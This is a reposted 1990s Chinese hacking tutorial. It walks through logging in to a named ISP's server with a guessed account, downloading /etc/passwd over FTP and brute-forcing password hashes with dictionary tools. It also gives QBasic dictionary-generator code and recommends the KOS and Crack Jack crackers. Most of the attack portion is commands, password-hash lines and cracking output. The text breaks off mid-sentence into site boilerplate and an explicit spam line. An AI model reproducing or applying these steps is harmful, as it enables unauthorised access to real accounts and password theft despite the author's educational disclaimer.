jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
lilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash
nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash
basic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash
wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash
kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash
shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash
fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash

(CoolFire 注: 因為使用 PaSs2DiC 很容易找出 ID 與 Password 相同的. 故除了 Coffee
外, 其
它我找到密碼的 EnCode Password 部份皆改過(guò)..... 除非你一個(gè)一個(gè)試啦~~~ 我沒(méi)說(shuō)喔!)

www:/etc$ exit
logout
Connection closed by foreign host.

(可以走了 !! 改用 FTP 將 /etc/passwd 給抓回來(lái)吧!)

ms.hinet.net.tw> ftp www.coffee.com.tw
Connected to www.coffee.com.tw.
220-
220- 歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽(yù), 大家自己去看吧!
220-
220-
220- There are 0 users in FTP Server now.
220- 目前已有 0 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- service@xx.xxxxxxx.xxx.xx.
220-
220-
220-
220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.

(還是使用剛剛的賬號進(jìn)入)

Name (www.coffee.com.tw:YourName): coffee
331 Password required for coffee.
Password:
230 User coffee logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

(直接到達檔案放置地點(diǎn))

ftp> cd /etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
ttys
fdprm
group
issue
motd
mtools
profile
securetty
shells
termcap
skel
csh.cshrc
csh.login
lilo
inet
default
services
HOSTNAME
DIR_COLORS
passwd
passwd.OLD
wtmp
utmp
gettydefs
inittab.gettyps.sample
ld.so.conf
ld.so.cache
at.deny
fs
magic
rc.d
syslog.conf
printcap
inittab
sudoers
vga
diphosts
mail.rc
ppp
NNTP_INEWS_DOMAIN
sendmail.st
NETWORKING
gateways
bootptab
exports
ftpusers
host.conf
hosts
hosts.allow
hosts.deny
hosts.equiv
inetd.conf
named.boot
networks
nntpserver
protocols
resolv.conf
rpc
ftpaccess
hosts.lpd
ftpconversions
snooptab
msgs
ftpgroups
slip.login
slip.hosts
yp.conf.example
X11
lilo.conf
sendmail.cf
fstab
fastboot
mtab
syslog.pid
klogd.pid
shutdownpid
localtime
passwd.old
ioctl.save
psdevtab
ftp.banner
ftp.deny
issue.net
motd.bak
securetty.old
226 Transfer complete.

(取回該檔案)

ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (4081 bytes).
226 Transfer complete.
4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

(盡速離開(kāi))

ftp> bye
221 Goodbye.

好了! 有了 /etc/passwd 之後一切都好辦了, 趕緊將你的寶貝收藏 PaSs2DiC 拿出來(lái)吧
!!
快點(diǎn)跑一下, 讓它自動(dòng)產(chǎn)生字典檔案:

C:\hack>pass2dic
PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.

This tool will:

[1] Load PASSWD file and convert it to only username text file
[2] Write the file to a dictionary file you choise for target

Your Source PASSWD File Name: passwd
Your Target Dictionary Name: dic.cfe

PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
FETAG Software Development Co: http://www.showtower.com.tw/~fetag

C:\hack>

(這樣就好了 ! 自動(dòng)產(chǎn)生的檔案會(huì )放在 dic.cfe 這個(gè)檔案中, 咱們跑一下 Brute Force
看看!)


C:\hack>fbrute passwd @dic.cfe

BRUTE!, Unix Brute Force Hacking Routine. v2.0
Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.
闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡

                                       
Attempts/Hits: 5184/9
                                       

Taking list input from dic.cfe
Beginning search of passwd for password: xxx

Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxx found! Username: xxxxx
Match for password xxx found! Username: xxx
Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxxx found! Username: xxxxxx
Match for password coffee found! Username: coffee
Match for password xxxxxxx found! Username: xxxxxxx
Match for password xxx found! Username: xxx
Match for password xxxx found! Username: xxxx

Done.

C:\hack>

看! 除了 coffee 外還是有許多人使用與 ID 相同的字作為密碼, 實(shí)在是....@#$%^...&*
因某些關(guān)系
所以其它部份要被 "馬賽克" 起來(lái), 請各位讀者見(jiàn)量!

**** 再談密碼 ****

看了以上的破解示范, 就可以了解到許多人還是對於 "密碼" 這東西不是很有 "密碼"
的觀(guān)念, 人就是
那麼的懶, 隨便設定一個(gè)好記的, 但是這種密碼確是最不安全的, 上次我們談到如何用
QBasic 來(lái)設計
一個(gè)自動(dòng)產(chǎn)生密碼的小程式, 相信對許多人有很大的幫助,
底下我們再來(lái)淺顯的介紹一下字母密碼的
產(chǎn)生方法, 相信對於你在 Hack 某站會(huì )有更大的幫助.

事情的開(kāi)始是有一位網(wǎng)友 mail 給我, 問(wèn)我字典檔要如何寫(xiě)程式來(lái) "自動(dòng)擴大",
而讓我有了寫(xiě)這一段的
想法, 現在我就針對這位網(wǎng)友的問(wèn)題作一個(gè)更詳細的說(shuō)明 (因已簡(jiǎn)短回信答覆),
并且寫(xiě)出來(lái)讓大家了
解一下, 當然我們的示范還是使用 QBasic, 因為這是最容易找到的程式了,
而且語(yǔ)法大家也可能會(huì )比較
熟悉一點(diǎn), 如果我使用 VB 或 C 來(lái)寫(xiě), 可能有些人只會(huì )拿去用,
而不會(huì )去修改或者寫(xiě)個(gè)好一點(diǎn)的出來(lái)!

先說(shuō)明一下原理好了: 我們所要作的程式是一個(gè)自動(dòng)產(chǎn)生字典檔的程式,
所以我們要了解字的字母排
列到底有哪些方法可循?? 我們先舉幾個(gè)簡(jiǎn)單的單字出來(lái)比較看看:

[1] apple [2] guest [3] james [4] superman [5] password

OK! 來(lái)看看! 如果你有一點(diǎn)英文的概念的話(huà)應該會(huì )知道母音及子音吧 !
我們首先這樣說(shuō)明: 母音在英文
上有 : A E I O U 這五個(gè), 所有的英文單字都會(huì )有這些母音
(有些沒(méi)有的可能是專(zhuān)有名詞或縮寫(xiě)), 也有可
能是雙母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等,
再來(lái)就是比較每個(gè)字的開(kāi)頭, 有可能是母音,
也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student
是兩個(gè)子音再接一個(gè)母
音字母, 所以接下來(lái)依照常用字將這些子音找出來(lái), 我想了一下大概有: br, bl, cl, dg,
dr, fl, gr, kn, ph, st,
sp, wh .... 等幾種(其它請自行統計), 然後是結尾部份, 通常結尾部分有下列幾種: e;
est; ord; ard; ls; es; s...
等好多好多, 我們稍為思考一下就知道要如何寫(xiě)出這樣的程式出來(lái)了 !!
我大略寫(xiě)一個(gè)簡(jiǎn)單的, 其它大家
自行發(fā)揮, 如果有人學(xué)語(yǔ)言學(xué)的, 請幫忙弄一份常用組合表出來(lái), 可能會(huì )更有幫助吧 !!

底下就是該程式片段, 執行後會(huì )產(chǎn)生 MyDic.Txt 檔, 大小為: 22,096 Bytes 共有 3120
個(gè)字的字典!!

--------------- MakeDic.BAS Start Here--------------
DIM FirstWord$(20)
DIM MotherWord$(13)
DIM LastWord$(12)

DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s",
"t", "p", "k" , "f", "m", "n", "b","k"
DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"
DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"

FOR I = 1 TO 20
READ FirstWord$(I)
PRINT FirstWord$(I)
NEXT I

FOR I = 1 TO 13
READ MotherWord$(I)
NEXT I

FOR I = 1 TO 12
READ LastWord$(I)
NEXT I

OPEN "MyDic.txt" FOR OUTPUT AS #1

FOR I = 1 TO 20
FOR J = 1 TO 13
FOR K = 1 TO 12
PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)
NEXT K
NEXT J
NEXT I

CLOSE : END
--------------- Cut Here, End of MakeDic.BAS--------------------

當然這只是小部份的組合, 相信你可以作出一個(gè)更大的字典檔出來(lái), 如:
子音+母音+子音+母音+子音, 作
出來(lái)的字典檔會(huì )很?chē)樔肃?!! 這一個(gè)部份就講到這里了 ! 如果你有很棒的字典產(chǎn)生程式,
寫(xiě)好了請 Mail 一
份給我喔 !! 如果可以的話(huà)請說(shuō)明是否可以公布在我的 W3 上讓其它人下載 !!
還是你只是要給我 ?!

希望每次講到密碼的問(wèn)題後, 大家可以將這些密碼的產(chǎn)生方法與自己的密碼對照看看,
如果有相同的請
趕緊將自己的密碼換掉, 我講得口沫橫飛, 都沒(méi)有人要聽(tīng)嗎 ??? 咖啡業(yè)者...... ISP
們.... 教教你們的使用者
吧..... 唉~~~~


**** 後語(yǔ) ****

我們的首頁(yè)感謝大家的支持, 現在人數已經(jīng)到達 2,000 了, 這是一個(gè)地下站
(未對外正式公布) 很棒的一個(gè)
數字, 在與其它工作室人員研究之後, 暫時(shí)不對外公布站址, 如果你是 "誤闖"
到本站來(lái)的! 我們歡迎你的
加入, 但目前尚不考慮對外公布站址, 請您在告訴你的朋友有這麼一個(gè)站存在的時(shí)候,
請他不要隨便告訴
別人 (請只告訴你信賴(lài)的朋友; 或對電腦有一份特別狂熱的人, 我們都歡迎他們的加入),
我們目前所采用
的方式將是開(kāi)放式的! 對首頁(yè)部份暫時(shí)不以密碼方式處理.

** 不要 Crack 這個(gè)首頁(yè)的 ISP!!!! 否則 FETAG Sofeware‘s Hacking Page
將會(huì )完全關(guān)閉, 再也不尋找其它的地
方來(lái)放置, 希望給你的是使用電腦的 "知識", 不要利用它來(lái)奪取任何的 "權利",
本首頁(yè)著(zhù)重的是教育, 而
不是一 的教導攻擊的方法, 希望大家對於政府機關(guān) (org.tw) 或教育機構 (edu.tw)
不要作任何的破壞!!
還有我的 ISP......:D
**** 課程開(kāi)始 ****

依我看, "字典" 這個(gè)討論應該是談不完的了, 因為有太多的方法了,
但是為了維護你自身的權益, 自己的密碼最好保管好, 我在前幾天剛拿到 KOS 的時(shí)候, 拿她來(lái)跑一個(gè) ISP 的/etc/passwd 檔案, 原先單單使用 Crack Jack 只找到 22 組的密碼, 用了 KOS 加上 Crack Jack 居然共找到了88 組的密碼, 還好該 ISP 不像 高-NET 一樣是屬於 "時(shí)數收費" 的收費方式, 不然可能有許多的User 自己當了冤大頭都還渾然不知. 所以這個(gè)討論還是免不了的, 如果你覺(jué)得你不需要這些知識,請跳過(guò)去吧!!

上次的字典檔討論, 我寫(xiě)了一個(gè)簡(jiǎn)短的程式出來(lái)產(chǎn)生了 3120 組的密碼,但是這些密碼并不一定是一個(gè) "字", 也就是說(shuō)產(chǎn)生完全合乎我們所限定的 "法則", 但卻不一定是一個(gè)已存在的字,所以如果要產(chǎn)生一個(gè) "高效率" 的字典檔, 使用上次所說(shuō)的那種方式就不是一個(gè)很好的方法了.以上次所寫(xiě)的程式 MAKEDIC.BAS 所產(chǎn)生的 MyDic.txt 為例, 其中的 braard clale cleoe dgeiingdgeie.......等字就不是很 "正常" 的字, 當然也有可能是某人的密碼, 但其機率小之又小.

這次所寫(xiě)的程式名稱(chēng)為 TXT2DIC.BAS, 我們還是先使用大家都熟悉的 QBASIC 來(lái)寫(xiě),
以方便日後的修改, 先說(shuō)明一下原理: 這個(gè)程式是一個(gè)自動(dòng)產(chǎn)生字典檔的程式, 我們是經(jīng)由給程式一個(gè)"文字檔", 然後由程式自該文字檔中 "抽取出" 字出來(lái), 這些文字檔必需是英文的文字檔,如果使用中文的文字檔的話(huà)程式跑起來(lái)會(huì )有問(wèn)題, 英文文字檔的取得可由英文版軟體的 Readme檔或網(wǎng)路上的英文版學(xué)術(shù)論文或其它的來(lái)源.

當然有可能在文件中會(huì )出現像 www.showtower.com.tw/~fetag 的字眼,我們總不能把它也列入字典檔中吧! 所以程式中有一點(diǎn)小小的設計, 就是該字若字母數大於 10 則不列入考慮,我們也可以使用上一次所介紹的子音+母音... 等的公式來(lái)作檢查法, 但是我沒(méi)有太多的時(shí)間作這些事,留待有空的人來(lái)寫(xiě)吧!!

底下就是該程式原始碼, 請各位以 QBASIC 來(lái)啟動(dòng)并執行它:

--------------- Txt2Dic.BAS Start Here--------------------

CLS
PRINT "Txt2Dic Version 0.1B (C)1997 By CoolFire ReChange: CoolFire"
PRINT "[Source Released, For Changer, Add Your Name in ReChange Field]"
PRINT
LINE INPUT "Text File Name: "; TxtFile$
LINE INPUT "Output Dic Name: "; DicFile$
OPEN TxtFile$ FOR INPUT AS #1
OPEN "TMPFILE1.$$$" FOR OUTPUT AS #2

REM Filter for text file

ReInput:
IF EOF(1) THEN GOTO EndFile
LINE INPUT #1, L$
ReTry:
L$ = LTRIM$(L$)
L$ = RTRIM$(L$)
TmpValue = INSTR(L$, " ")
IF TmpValue <> 0 THEN
DicTxt$ = LEFT$(L$, TmpValue - 1)
PRINT #2, DicTxt$
LOCATE 7, 1: PRINT "Step 1, Add word : "; DicTxt$; STRING$(10, " ")
L$ = RIGHT$(L$, LEN(L$) - TmpValue)
GOTO ReTry
ELSE
GOTO ReInput
END IF
END

EndFile:
CLOSE
REM Filter for special chapter and lower-case the word

OPEN "TMPFILE1.$$$" FOR INPUT AS #1
OPEN DicFile$ FOR OUTPUT AS #2
Special$ = "-,.:<>?*()/_" + CHR$(34)
DO
LINE INPUT #1, L$
FOR I = 1 TO 13
SP$ = MID$(Special$, I, 1)
TmpValue = INSTR(L$, SP$)
IF TmpValue <> 0 THEN
LOCATE 8, 1: PRINT "Remode special word :"; L$; STRING$(10, " ")
L$ = ""
END IF
NEXT I
IF L$ <> "" THEN
L$ = LCASE$(L$)
PRINT #2, L$
END IF
LOOP UNTIL EOF(1)
CLOSE
KILL "TMPFILE1.$$$"
END
--------------- Cut Here, End of Txt2Dic.BAS---------------------

我只花了幾分鐘寫(xiě)這個(gè)程式, 因為時(shí)間緊迫 (為了在過(guò)年前將此篇送出),所以有些考慮到的地方都沒(méi)有作修改, 在這里再作些說(shuō)明: 這個(gè)程式的第一個(gè)部份為分解字串, 將碰到的 CHR$(20)也就是空白分離出來(lái), 這是分解一句話(huà)中字與字最簡(jiǎn)單的方法,并且會(huì )將分解出來(lái)的字存在一個(gè)暫存檔中, 作為第二部分的使用. 第二部分將暫存檔讀入, 并過(guò)濾非正常的字母出現,我只讓它過(guò)濾了十三種特殊字如: -,.:<>?*()/_" 等, 當然如果你可視需要再作刪減的功能.

原本想要再寫(xiě)排序及過(guò)濾重覆字的功能, 但是這些功能不是那麼需要,因為在排序方面你可以使用電腦中 DOS 的 SORT 或 Crack Jack 的 JSort, 過(guò)濾重覆字也有 CoolFire 的 De-Sort可以使用, 所以就先在這里停住, 有心的讀者可以自行修改, 修改完後也請傳送一份給我,作為日後教學(xué)的參考之用, 或提供網(wǎng)友們分享.

仔細看一看這個(gè)程式還是有很多地方?jīng)]有作修正, 或是沒(méi)有作 Error Handle 等,但已經(jīng)給各位原始程式了, 大家就試著(zhù)修改看看吧! Qbaisc 是一個(gè)很簡(jiǎn)單的語(yǔ)言,只要你試試看就可以把這個(gè)程式改得很好了. 用這個(gè)程式試了一個(gè)文字檔, 發(fā)現它找到的字都是一些很簡(jiǎn)單的字,當然跟你所給它的材料有很大的關(guān)系, 使用這個(gè)程式配合一個(gè)很棒的材料檔, 應該可以作出一份很棒的字典檔,希望大家可以好好的利用它.

-*-*-*-*-*-*-*-*-*-**-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-


**** 新工具程式 Global KOS Krack (KOS) ****

記得從上次講過(guò) Crack Jack 之後好像就沒(méi)有再講過(guò) Password Crack 的工具程式了,
當然也跟最近沒(méi)有甚麼好程式出現有關(guān)系, 像前一陣子風(fēng)行的 Mail Bomb 最近也沒(méi)有再見(jiàn)到改版,倒是出現了一些寫(xiě)得不怎麼樣的 Bomb 程式, 了無(wú)新意, 我現在還是在用 KaBoom 3.0, 前幾天無(wú)聊逛了一下國外的 Crack 站臺, 意外的發(fā)現了一個(gè)叫作 KOS 的東西, 傳回來(lái)試了一試果然不錯,而且里面還包含了一個(gè) 3MB 多的字典檔, 這對字典檔中缺料的讀者們肯定會(huì )有幫助的.

KOS 是許多工具的集合, 由一些批次檔對這些工具作了很棒的整合, 它必須與 Crack Jack一起使用才能運作, 平常我們在處里 Password Crack 時(shí)都需要考慮到第一個(gè)字母大寫(xiě), 加數字,字母大小寫(xiě)轉換等等的工作, 都可以由 KOS 一手包辦, 你只要取得 KOS, 就可以配合著(zhù) Crack Jack將以前單單使用 Jack 尋找的 /etc/passwd %
本站僅提供存儲服務(wù),所有內容均由用戶(hù)發(fā)布,如發(fā)現有害或侵權內容,請點(diǎn)擊舉報。
打開(kāi)APP,閱讀全文并永久保存 查看更多類(lèi)似文章
猜你喜歡
類(lèi)似文章
ubuntu用戶(hù)管理
Unix系統的攻擊和防范 - Linux伊甸園----Linuxeden_com-Linu...
liunx 用戶(hù)管理和ROOT權限控制
手動(dòng)修改/etc/shadow和/etc/passwd中的用戶(hù)密碼
Linux系統下批量創(chuàng )建用戶(hù)講解
【shell腳本分享】100個(gè)Shell腳本經(jīng)典案例解析
更多類(lèi)似文章 >>
生活服務(wù)
分享 收藏 導長(cháng)圖 關(guān)注 下載文章
綁定賬號成功
后續可登錄賬號暢享VIP特權!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服

欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久